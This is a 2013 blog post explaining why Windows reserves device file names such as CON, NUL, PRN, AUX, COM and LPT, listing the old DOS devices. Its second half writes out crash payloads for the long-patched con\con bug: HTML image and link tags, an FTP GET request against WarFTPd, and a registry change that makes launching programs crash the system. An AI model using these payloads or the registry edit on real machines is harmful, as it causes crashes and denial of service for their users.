Monday, 30 September 2013

Why can't you create a folder named CON in Windows?

In MS-DOS, several special "device files" were available to aid in performing certain tasks, such as clearing the screen or deleting extraneous output from a program. In order to maintain backwards-compatibility, all versions of Windows up to and including Windows 7 will refuse to allow you to create a file with these "reserved" device file names. The following file names are reserved: 

  • CON
  • PRN
  • AUX
  • NUL
  • COM1
  • COM2
  • COM3
  • COM4
  • COM5
  • COM6
  • COM7
  • COM8
  • COM9
  • LPT1
  • LPT2
  • LPT3
  • LPT4
  • LPT5
  • LPT6
  • LPT7
  • LPT8
  • LPT9

CON, incidentally, was a device file used to capture whatever was printed onscreen.

NUL, AUX, CON, COM1-4, LPT1-3, and PRN
are reserved words used for DOS Devices 

These are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:

CLOCK$ - System clock
CON - Console; combination of keyboard and screen to handle input and output
AUX or COM1 - First serial communicationport
COMn - Second, Third, ... communicationport
LPT1 or PRN - First parallel port
NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null.
CONFIG$ - Unknown

Besides,

1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).

Example:
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>

2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.

3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.

4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.

Example:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>

No comments:

Post a Comment